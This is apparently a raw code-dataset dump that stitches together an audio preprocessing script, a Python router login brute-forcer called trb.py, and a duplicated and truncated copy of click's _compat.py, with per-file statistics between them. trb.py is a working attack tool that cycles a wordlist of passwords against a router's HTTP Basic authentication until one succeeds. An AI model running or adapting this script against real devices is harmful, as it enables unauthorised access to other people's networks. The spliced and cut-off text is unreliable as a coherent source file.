# Don't want remixes of a lot of songs (typically long audio files).
duration = get_time(load_dir, fname)
if duration >= duration_thresh or duration == False:
return None
elif duration < sample_length*3/sr: # give ourselves some buffer with x3
return None
else:
# Load audio only for valid files
Data = []
audio, _ = Load(load_dir, fname, sr, verbose=False)
if crop_style == 'BegEnd':
begin_audio = SR(audio, 'begin')[0:sample_length]
end_audio = SR(audio, 'end')[-sample_length:]
Data.append(begin_audio)
Data.append(end_audio)
return (Data)
###############################################################################
"""Script to load in training/validation/test data, preprocess, and convert to
tfrecords format for training the NSynth model.
Example :
python DataPrep.py ~/Data/EDM/ 4 ~/DeepBass/data/preprocessed/EDM/ EDM -n_cpu=72
"""
parser = argparse.ArgumentParser(description='Load Audio Files')
parser.add_argument('-load_dir', help='Directory of audio files',
action=FullPaths, type=is_dir, required=True)
parser.add_argument('-time', help='Specify the amount of time to crop to',
type=float, required=True)
parser.add_argument('-save_dir', help='Directory to save processed audio files',
type=str, required=True)
parser.add_argument('-savename', help='Specify the name of the tfrecords file',
type=str, required=True)
parser.add_argument('-crop_style', help='Method for temporal cropping',
choices=['BegEnd'], default='BegEnd')
parser.add_argument('-sr', default=16000, help='Specify sampling rate for audio',
type=int)
parser.add_argument('-duration_thresh', default=1000, help='Maximum number of \
seconds per audio file.', type=float)
parser.add_argument('-n_cpu', default=1, help='Number of CPU threads to use.',
type=int)
args = parser.parse_args()
# Create the save folder if it does not exist
if not os.path.exists(args.save_dir):
try:
os.makedirs(args.save_dir)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
filenames = [f for f in listdir(args.load_dir) if isfile(join(args.load_dir,
f))]
# Number of samples to export
sample_length = int(args.time * args.sr)
Data = []
Data = Parallel(n_jobs=args.n_cpu)(delayed(Prep)(fname,
args.load_dir,
args.sr,
args.duration_thresh,
sample_length,
args.crop_style) \
for fname in filenames)
# Remove audio snippets that returned None
Data = [x for x in Data if x is not None]
# Merge everything into one list from a list of lists
Data = [item for sublist in Data for item in sublist]
# Remove empty lists
Data = [x for x in Data if x != []]
os.chdir(args.save_dir) # Move directory for saving
np_to_tfrecords(np.stack(Data), None, args.savename, verbose=True) | 42.932039 | 82 | 0.60493 | import os
import argparse
from ingestion.IO_utils import Load
import numpy as np
import errno
from preprocess.SilenceRemoval import SR
from preprocess.np_to_tfrecords import np_to_tfrecords
from preprocess.get_time import get_time
from os import listdir
from os.path import isfile, join
from joblib import Parallel, delayed
| true | true |
1c3ca320e711d55930e495327ed5ac5f2359cf78 | 1,587 | py | Python | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | 7 | 2018-09-12T17:12:39.000Z | 2021-07-02T16:56:18.000Z | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | null | null | null | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | 4 | 2018-06-25T17:54:26.000Z | 2021-04-07T06:11:09.000Z | #!/usr/bin/python
# TOOLS ROUTER BRUTE - V1.0.0
# Developement: Walderlan Sena <senawalderlan@gmail.com>
#
import requests as r
import base64
import sys
import os
def splash():
print(
"""
TOOLS ROUTER BRUTE - v1.0.0
Site: https://www.github.com/WalderlanSena/toolsrouterbrute
Developement: Walderlan Sena <senwalderlan@gmail.com>
"""
)
if len(sys.argv) < 2:
splash()
print("\tUsage: ./trb.py user IPRouter wordlist\n")
print("\tExample: ./trb.py admin 192.168.1.1 list.txt\n")
exit(1)
os.system('setterm -cursor off')
def main():
wordlist = open(sys.argv[3], 'r')
count = 0
for i in wordlist:
login = str(sys.argv[1])
password = i.rstrip()
auth = "Basic "
authEncode = auth+base64.b64encode(login+':'+password)
cookie = {"Authorization": authEncode}
try:
response = r.get('http://'+sys.argv[2], cookies=cookie)
except:
splash()
print("\tError to connect: " + sys.argv[2])
exit(1)
if not response.content.count('id="userName"') != 1:
splash()
os.system('setterm -cursor on')
print('\n\tPassword Found =====> ' + password)
exit(0)
os.system("clear")
splash()
count = count + 1
print('\t[ '+ str(count) + ' ] Password not found ===> ' + password)
if __name__ == "__main__":
try:
main();
except KeyboardInterrupt:
os.system('setterm -cursor on')
print("\nOperation canceled ! :(\n")
| 23.338235 | 76 | 0.555766 |
import requests as r
import base64
import sys
import os
def splash():
print(
"""
TOOLS ROUTER BRUTE - v1.0.0
Site: https://www.github.com/WalderlanSena/toolsrouterbrute
Developement: Walderlan Sena <senwalderlan@gmail.com>
"""
)
if len(sys.argv) < 2:
splash()
print("\tUsage: ./trb.py user IPRouter wordlist\n")
print("\tExample: ./trb.py admin 192.168.1.1 list.txt\n")
exit(1)
os.system('setterm -cursor off')
def main():
wordlist = open(sys.argv[3], 'r')
count = 0
for i in wordlist:
login = str(sys.argv[1])
password = i.rstrip()
auth = "Basic "
authEncode = auth+base64.b64encode(login+':'+password)
cookie = {"Authorization": authEncode}
try:
response = r.get('http://'+sys.argv[2], cookies=cookie)
except:
splash()
print("\tError to connect: " + sys.argv[2])
exit(1)
if not response.content.count('id="userName"') != 1:
splash()
os.system('setterm -cursor on')
print('\n\tPassword Found =====> ' + password)
exit(0)
os.system("clear")
splash()
count = count + 1
print('\t[ '+ str(count) + ' ] Password not found ===> ' + password)
if __name__ == "__main__":
try:
main();
except KeyboardInterrupt:
os.system('setterm -cursor on')
print("\nOperation canceled ! :(\n")
| true | true |
1c3ca35bcab506e0d9e128e8f0a6d9db17c9822f | 23,409 | py | Python | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | import re
import io
import os
import sys
import codecs
from weakref import WeakKeyDictionary
PY2 = sys.version_info[0] == 2
CYGWIN = sys.platform.startswith('cygwin')
# Determine local App Engine environment, per Google's own suggestion
APP_ENGINE = ('APPENGINE_RUNTIME' in os.environ and
'Development/' in os.environ['SERVER_SOFTWARE'])
WIN = sys.platform.startswith('win') and not APP_ENGINE
DEFAULT_COLUMNS = 80
_ansi_re = re.compile(r'\033\[((?:\d|;)*)([a-zA-Z])')
def get_filesystem_encoding():
return sys.getfilesystemencoding() or sys.getdefaultencoding()
def _make_text_stream(stream, encoding, errors,
force_readable=False, force_writable=False):
if encoding is None:
encoding = get_best_encoding(stream)
if errors is None:
errors = 'replace'
return _NonClosingTextIOWrapper(stream, encoding, errors,
line_buffering=True,
force_readable=force_readable,
force_writable=force_writable)
def is_ascii_encoding(encoding):
"""Checks if a given encoding is ascii."""
try:
return codecs.lookup(encoding).name == 'ascii'
except LookupError:
return False
def get_best_encoding(stream):
"""Returns the default stream encoding if not found."""
rv = getattr(stream, 'encoding', None) or sys.getdefaultencoding()
if is_ascii_encoding(rv):
return 'utf-8'
return rv
class _NonClosingTextIOWrapper(io.TextIOWrapper):
def __init__(self, stream, encoding, errors,
force_readable=False, force_writable=False, **extra):
self._stream = stream = _FixupStream(stream, force_readable,
force_writable)
io.TextIOWrapper.__init__(self, stream, encoding, errors, **extra)
# The io module is a place where the Python 3 text behavior
# was forced upon Python 2, so we need to unbreak
# it to look like Python 2.
if PY2:
def write(self, x):
if isinstance(x, str) or is_bytes(x):
try:
self.flush()
except Exception:
pass
return self.buffer.write(str(x))
return io.TextIOWrapper.write(self, x)
def writelines(self, lines):
for line in lines:
self.write(line)
def __del__(self):
try:
self.detach()
except Exception:
pass
def isatty(self):
# https://bitbucket.org/pypy/pypy/issue/1803
return self._stream.isatty()
class _FixupStream(object):
"""The new io interface needs more from streams than streams
traditionally implement. As such, this fix-up code is necessary in
some circumstances.
The forcing of readable and writable flags are there because some tools
put badly patched objects on sys (one such offender are certain version
of jupyter notebook).
"""
def __init__(self, stream, force_readable=False, force_writable=False):
self._stream = stream
self._force_readable = force_readable
self._force_writable = force_writable
def __getattr__(self, name):
return getattr(self._stream, name)
def read1(self, size):
f = getattr(self._stream, 'read1', None)
if f is not None:
return f(size)
# We only dispatch to readline instead of read in Python 2 as we
# do not want cause problems with the different implementation
# of line buffering.
if PY2:
return self._stream.readline(size)
return self._stream.read(size)
def readable(self):
if self._force_readable:
return True
x = getattr(self._stream, 'readable', None)
if x is not None:
return x()
try:
self._stream.read(0)
except Exception:
return False
return True
def writable(self):
if self._force_writable:
return True
x = getattr(self._stream, 'writable', None)
if x is not None:
return x()
try:
self._stream.write('')
except Exception:
try:
self._stream.write(b'')
except Exception:
return False
return True
def seekable(self):
x = getattr(self._stream, 'seekable', None)
if x is not None:
return x()
try:
self._stream.seek(self._stream.tell())
except Exception:
return False
return True
if PY2:
text_type = unicode
bytes = str
raw_input = raw_input
string_types = (str, unicode)
int_types = (int, long)
iteritems = lambda x: x.iteritems()
range_type = xrange
def is_bytes(x):
return isinstance(x, (buffer, bytearray))
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
# For Windows, we need to force stdout/stdin/stderr to binary if it's
# fetched for that. This obviously is not the most correct way to do
# it as it changes global state. Unfortunately, there does not seem to
# be a clear better way to do it as just reopening the file in binary
# mode does not change anything.
#
# An option would be to do what Python 3 does and to open the file as
# binary only, patch it back to the system, and then use a wrapper
# stream that converts newlines. It's not quite clear what's the
# correct option here.
#
# This code also lives in _winconsole for the fallback to the console
# emulation stream.
#
# There are also Windows environments where the `msvcrt` module is not
# available (which is why we use try-catch instead of the WIN variable
# here), such as the Google App Engine development server on Windows. In
# those cases there is just nothing we can do.
def set_binary_mode(f):
return f
try:
import msvcrt
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
msvcrt.setmode(fileno, os.O_BINARY)
return f
try:
import fcntl
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
flags = fcntl.fcntl(fileno, fcntl.F_GETFL)
fcntl.fcntl(fileno, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
return f
def isidentifier(x):
return _identifier_re.search(x) is not None
def get_binary_stdin():
return set_binary_mode(sys.stdin)
def get_binary_stdout():
_wrap_std_stream('stdout')
return set_binary_mode(sys.stdout)
def get_binary_stderr():
_wrap_std_stream('stderr')
return set_binary_mode(sys.stderr)
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
_wrap_std_stream('stdout')
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
_wrap_std_stream('stderr')
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
return value
else:
import io
text_type = str
raw_input = input
string_types = (str,)
int_types = (int,)
range_type = range
isidentifier = lambda x: x.isidentifier()
iteritems = lambda x: iter(x.items())
def is_bytes(x):
return isinstance(x, (bytes, memoryview, bytearray))
def _is_binary_reader(stream, default=False):
try:
return isinstance(stream.read(0), bytes)
except Exception:
return default
# This happens in some cases where the stream was already
# closed. In this case, we assume the default.
def _is_binary_writer(stream, default=False):
try:
stream.write(b'')
except Exception:
try:
stream.write('')
return False
except Exception:
pass
return default
return True
def _find_binary_reader(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detaching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_reader(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_reader(buf, True):
return buf
def _find_binary_writer(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detatching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_writer(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_writer(buf, True):
return buf
def _stream_is_misconfigured(stream):
"""A stream is misconfigured if its encoding is ASCII."""
# If the stream does not have an encoding set, we assume it's set
# to ASCII. This appears to happen in certain unittest
# environments. It's not quite clear what the correct behavior is
# but this at least will force Click to recover somehow.
return is_ascii_encoding(getattr(stream, 'encoding', None) or 'ascii')
def _is_compatible_text_stream(stream, encoding, errors):
stream_encoding = getattr(stream, 'encoding', None)
stream_errors = getattr(stream, 'errors', None)
# Perfect match.
if stream_encoding == encoding and stream_errors == errors:
return True
# Otherwise, it's only a compatible stream if we did not ask for
# an encoding.
if encoding is None:
return stream_encoding is not None
return False
def _force_correct_text_reader(text_reader, encoding, errors,
force_readable=False):
if _is_binary_reader(text_reader, False):
binary_reader = text_reader
else:
# If there is no target encoding set, we need to verify that the
# reader is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_reader):
return text_reader
if _is_compatible_text_stream(text_reader, encoding, errors):
return text_reader
# If the reader has no encoding, we try to find the underlying
# binary reader for it. If that fails because the environment is
# misconfigured, we silently go with the same reader because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_reader = _find_binary_reader(text_reader)
if binary_reader is None:
return text_reader
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_reader, encoding, errors,
force_readable=force_readable)
def _force_correct_text_writer(text_writer, encoding, errors,
force_writable=False):
if _is_binary_writer(text_writer, False):
binary_writer = text_writer
else:
# If there is no target encoding set, we need to verify that the
# writer is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_writer):
return text_writer
if _is_compatible_text_stream(text_writer, encoding, errors):
return text_writer
# If the writer has no encoding, we try to find the underlying
# binary writer for it. If that fails because the environment is
# misconfigured, we silently go with the same writer because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_writer = _find_binary_writer(text_writer)
if binary_writer is None:
return text_writer
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_writer, encoding, errors,
force_writable=force_writable)
def get_binary_stdin():
reader = _find_binary_reader(sys.stdin)
if reader is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdin.')
return reader
def get_binary_stdout():
writer = _find_binary_writer(sys.stdout)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdout.')
return writer
def get_binary_stderr():
writer = _find_binary_writer(sys.stderr)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stderr.')
return writer
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_reader(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
else:
value = value.encode('utf-8', 'surrogateescape') \
.decode('utf-8', 'replace')
return value
def get_streerror(e, default=None):
if hasattr(e, 'strerror'):
msg = e.strerror
else:
if default is not None:
msg = default
else:
msg = str(e)
if isinstance(msg, bytes):
msg = msg.decode('utf-8', 'replace')
return msg
def open_stream(filename, mode='r', encoding=None, errors='strict',
atomic=False):
# Standard streams first. These are simple because they don't need
# special handling for the atomic flag. It's entirely ignored.
if filename == '-':
if any(m in mode for m in ['w', 'a', 'x']):
if 'b' in mode:
return get_binary_stdout(), False
return get_text_stdout(encoding=encoding, errors=errors), False
if 'b' in mode:
return get_binary_stdin(), False
return get_text_stdin(encoding=encoding, errors=errors), False
# Non-atomic writes directly go out through the regular open functions.
if not atomic:
if encoding is None:
return open(filename, mode), True
return io.open(filename, mode, encoding=encoding, errors=errors), True
# Some usability stuff for atomic writes
if 'a' in mode:
raise ValueError(
'Appending to an existing file is not supported, because that '
'would involve an expensive `copy`-operation to a temporary '
'file. Open the file in normal `w`-mode and copy explicitly '
'if that\'s what you\'re after.'
)
if 'x' in mode:
raise ValueError('Use the `overwrite`-parameter instead.')
if 'w' not in mode:
raise ValueError('Atomic writes only make sense with `w`-mode.')
# Atomic writes are more complicated. They work by opening a file
# as a proxy in the same folder and then using the fdopen
# functionality to wrap it in a Python file. Then we wrap it in an
# atomic file that moves the file over on close.
import tempfile
fd, tmp_filename = tempfile.mkstemp(dir=os.path.dirname(filename),
prefix='.__atomic-write')
if encoding is not None:
f = io.open(fd, mode, encoding=encoding, errors=errors)
else:
f = os.fdopen(fd, mode)
return _AtomicFile(f, tmp_filename, os.path.realpath(filename)), True
# Used in a destructor call, needs extra protection from interpreter cleanup.
if hasattr(os, 'replace'):
_replace = os.replace
_can_replace = True
else:
_replace = os.rename
_can_replace = not WIN
class _AtomicFile(object):
def __init__(self, f, tmp_filename, real_filename):
self._f = f
self._tmp_filename = tmp_filename
self._real_filename = real_filename
self.closed = False
@property
def name(self):
return self._real_filename
def close(self, delete=False):
if self.closed:
return
self._f.close()
if not _can_replace:
try:
os.remove(self._real_filename)
except OSError:
pass
_replace(self._tmp_filename, self._real_filename)
self.closed = True
def __getattr__(self, name):
return getattr(self._f, name)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close(delete=exc_type is not None)
def __repr__(self):
return repr(self._f)
auto_wrap_for_ansi = None
colorama = None
get_winterm_size = None
def strip_ansi(value):
return _ansi_re.sub('', value)
def should_strip_ansi(stream=None, color=None):
if color is None:
if stream is None:
stream = sys.stdin
return not isatty(stream)
return not color
# If we're on Windows, we provide transparent integration through
# colorama. This will make ANSI colors through the echo function
# work automatically.
if WIN:
# Windows has a smaller terminal
DEFAULT_COLUMNS = 79
from ._winconsole import _get_windows_console_stream, _wrap_std_stream
def _get_argv_encoding():
import locale
return locale.getpreferredencoding()
if PY2:
def raw_input(prompt=''):
sys.stderr.flush()
if prompt:
stdout = _default_text_stdout()
stdout.write(prompt)
stdin = _default_text_stdin()
return stdin.readline().rstrip('\r\n')
try:
import colorama
except ImportError:
pass
else:
_ansi_stream_wrappers = WeakKeyDictionary()
def auto_wrap_for_ansi(stream, color=None):
"""This function wraps a stream so that calls through colorama
are issued to the win32 console API to recolor on demand. It
also ensures to reset the colors if a write call is interrupted
to not destroy the console afterwards.
"""
try:
cached = _ansi_stream_wrappers.get(stream)
except Exception:
cached = None
if cached is not None:
return cached
strip = should_strip_ansi(stream, color)
ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip)
rv = ansi_wrapper.stream
_write = rv.write
def _safe_write(s):
try:
return _write(s)
except Exception:
ansi_wrapper.reset_all()
raise
rv.write = _safe_write
try:
_ansi_stream_wrappers[stream] = rv
except Exception:
pass
return rv
def get_winterm_size():
win = colorama.win32.GetConsoleScreenBufferInfo(
colorama.win32.STDOUT).srWindow
return win.Right - win.Left, win.Bottom - win.Top
else:
def _get_argv_encoding():
return getattr(sys.stdin, 'encoding', None) or get_filesystem_encoding()
_get_windows_console_stream = lambda *x: None
_wrap_std_stream = lambda *x: None
def term_len(x):
return len(strip_ansi(x))
def isatty(stream):
try:
return stream.isatty()
except Exception:
return False
def _make_cached_stream_func(src_func, wrapper_func):
cache = WeakKeyDictionary()
def func():
stream = src_func()
try:
rv = cache.get(stream)
except Exception:
rv = None
if rv is not None:
return rv
rv = wrapper_func()
try:
stream = src_func() # In case wrapper_func() modified the stream
cache[stream] = rv
except Exception:
pass
return rv
return func
_default_text_stdin = _make_cached_stream_func(
lambda: sys.stdin, get_text_stdin)
_default_text_stdout = _make_cached_stream_func(
lambda: sys.stdout, get_text_stdout)
_default_text_stderr = _make_cached_stream_func(
lambda: sys.stderr, get_text_stderr)
binary_streams = {
'stdin': get_binary_stdin,
'stdout': get_binary_stdout,
'stderr': get_binary_stderr,
}
text_streams = {
'stdin': get_text_stdin,
'stdout': get_text_stdout,
'stderr': get_text_stderr,
}
| 33.25142 | 80 | 0.610065 | import re
import io
import os
import sys
import codecs
from weakref import WeakKeyDictionary
PY2 = sys.version_info[0] == 2
CYGWIN = sys.platform.startswith('cygwin')
APP_ENGINE = ('APPENGINE_RUNTIME' in os.environ and
'Development/' in os.environ['SERVER_SOFTWARE'])
WIN = sys.platform.startswith('win') and not APP_ENGINE
DEFAULT_COLUMNS = 80
_ansi_re = re.compile(r'\033\[((?:\d|;)*)([a-zA-Z])')
def get_filesystem_encoding():
return sys.getfilesystemencoding() or sys.getdefaultencoding()
def _make_text_stream(stream, encoding, errors,
force_readable=False, force_writable=False):
if encoding is None:
encoding = get_best_encoding(stream)
if errors is None:
errors = 'replace'
return _NonClosingTextIOWrapper(stream, encoding, errors,
line_buffering=True,
force_readable=force_readable,
force_writable=force_writable)
def is_ascii_encoding(encoding):
try:
return codecs.lookup(encoding).name == 'ascii'
except LookupError:
return False
def get_best_encoding(stream):
rv = getattr(stream, 'encoding', None) or sys.getdefaultencoding()
if is_ascii_encoding(rv):
return 'utf-8'
return rv
class _NonClosingTextIOWrapper(io.TextIOWrapper):
def __init__(self, stream, encoding, errors,
force_readable=False, force_writable=False, **extra):
self._stream = stream = _FixupStream(stream, force_readable,
force_writable)
io.TextIOWrapper.__init__(self, stream, encoding, errors, **extra)
# The io module is a place where the Python 3 text behavior
# was forced upon Python 2, so we need to unbreak
# it to look like Python 2.
if PY2:
def write(self, x):
if isinstance(x, str) or is_bytes(x):
try:
self.flush()
except Exception:
pass
return self.buffer.write(str(x))
return io.TextIOWrapper.write(self, x)
def writelines(self, lines):
for line in lines:
self.write(line)
def __del__(self):
try:
self.detach()
except Exception:
pass
def isatty(self):
# https://bitbucket.org/pypy/pypy/issue/1803
return self._stream.isatty()
class _FixupStream(object):
def __init__(self, stream, force_readable=False, force_writable=False):
self._stream = stream
self._force_readable = force_readable
self._force_writable = force_writable
def __getattr__(self, name):
return getattr(self._stream, name)
def read1(self, size):
f = getattr(self._stream, 'read1', None)
if f is not None:
return f(size)
# We only dispatch to readline instead of read in Python 2 as we
# do not want cause problems with the different implementation
# of line buffering.
if PY2:
return self._stream.readline(size)
return self._stream.read(size)
def readable(self):
if self._force_readable:
return True
x = getattr(self._stream, 'readable', None)
if x is not None:
return x()
try:
self._stream.read(0)
except Exception:
return False
return True
def writable(self):
if self._force_writable:
return True
x = getattr(self._stream, 'writable', None)
if x is not None:
return x()
try:
self._stream.write('')
except Exception:
try:
self._stream.write(b'')
except Exception:
return False
return True
def seekable(self):
x = getattr(self._stream, 'seekable', None)
if x is not None:
return x()
try:
self._stream.seek(self._stream.tell())
except Exception:
return False
return True
if PY2:
text_type = unicode
bytes = str
raw_input = raw_input
string_types = (str, unicode)
int_types = (int, long)
iteritems = lambda x: x.iteritems()
range_type = xrange
def is_bytes(x):
return isinstance(x, (buffer, bytearray))
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
# For Windows, we need to force stdout/stdin/stderr to binary if it's
def set_binary_mode(f):
return f
try:
import msvcrt
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
msvcrt.setmode(fileno, os.O_BINARY)
return f
try:
import fcntl
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
flags = fcntl.fcntl(fileno, fcntl.F_GETFL)
fcntl.fcntl(fileno, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
return f
def isidentifier(x):
return _identifier_re.search(x) is not None
def get_binary_stdin():
return set_binary_mode(sys.stdin)
def get_binary_stdout():
_wrap_std_stream('stdout')
return set_binary_mode(sys.stdout)
def get_binary_stderr():
_wrap_std_stream('stderr')
return set_binary_mode(sys.stderr)
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
_wrap_std_stream('stdout')
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
_wrap_std_stream('stderr')
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
return value
else:
import io
text_type = str
raw_input = input
string_types = (str,)
int_types = (int,)
range_type = range
isidentifier = lambda x: x.isidentifier()
iteritems = lambda x: iter(x.items())
def is_bytes(x):
return isinstance(x, (bytes, memoryview, bytearray))
def _is_binary_reader(stream, default=False):
try:
return isinstance(stream.read(0), bytes)
except Exception:
return default
def _is_binary_writer(stream, default=False):
try:
stream.write(b'')
except Exception:
try:
stream.write('')
return False
except Exception:
pass
return default
return True
def _find_binary_reader(stream):
if _is_binary_reader(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
if buf is not None and _is_binary_reader(buf, True):
return buf
def _find_binary_writer(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detatching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_writer(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_writer(buf, True):
return buf
def _stream_is_misconfigured(stream):
"""A stream is misconfigured if its encoding is ASCII."""
# to ASCII. This appears to happen in certain unittest
# environments. It's not quite clear what the correct behavior is
return is_ascii_encoding(getattr(stream, 'encoding', None) or 'ascii')
def _is_compatible_text_stream(stream, encoding, errors):
stream_encoding = getattr(stream, 'encoding', None)
stream_errors = getattr(stream, 'errors', None)
if stream_encoding == encoding and stream_errors == errors:
return True
# an encoding.
if encoding is None:
return stream_encoding is not None
return False
def _force_correct_text_reader(text_reader, encoding, errors,
force_readable=False):
if _is_binary_reader(text_reader, False):
binary_reader = text_reader
else:
# If there is no target encoding set, we need to verify that the
# reader is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_reader):
return text_reader
if _is_compatible_text_stream(text_reader, encoding, errors):
return text_reader
# If the reader has no encoding, we try to find the underlying
# binary reader for it. If that fails because the environment is
# misconfigured, we silently go with the same reader because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_reader = _find_binary_reader(text_reader)
if binary_reader is None:
return text_reader
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_reader, encoding, errors,
force_readable=force_readable)
def _force_correct_text_writer(text_writer, encoding, errors,
force_writable=False):
if _is_binary_writer(text_writer, False):
binary_writer = text_writer
else:
if encoding is None and not _stream_is_misconfigured(text_writer):
return text_writer
if _is_compatible_text_stream(text_writer, encoding, errors):
return text_writer
binary_writer = _find_binary_writer(text_writer)
if binary_writer is None:
return text_writer
if errors is None:
errors = 'replace'
return _make_text_stream(binary_writer, encoding, errors,
force_writable=force_writable)
def get_binary_stdin():
reader = _find_binary_reader(sys.stdin)
if reader is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdin.')
return reader
def get_binary_stdout():
writer = _find_binary_writer(sys.stdout)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdout.')
return writer
def get_binary_stderr():
writer = _find_binary_writer(sys.stderr)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stderr.')
return writer
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_reader(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
else:
value = value.encode('utf-8', 'surrogateescape') \
.decode('utf-8', 'replace')
return value
def get_streerror(e, default=None):
if hasattr(e, 'strerror'):
msg = e.strerror
else:
if default is not None:
msg = default
else:
msg = str(e)
if isinstance(msg, bytes):
msg = msg.decode('utf-8', 'replace')
return msg
def open_stream(filename, mode='r', encoding=None, errors='strict',
atomic=False):
# Standard streams first. These are simple because they don't need
if filename == '-':
if any(m in mode for m in ['w', 'a', 'x']):
if 'b' in mode:
return get_binary_stdout(), False
return get_text_stdout(encoding=encoding, errors=errors), False
if 'b' in mode:
return get_binary_stdin(), False
return get_text_stdin(encoding=encoding, errors=errors), False
# Non-atomic writes directly go out through the regular open functions.
if not atomic:
if encoding is None:
return open(filename, mode), True
return io.open(filename, mode, encoding=encoding, errors=errors), True
# Some usability stuff for atomic writes
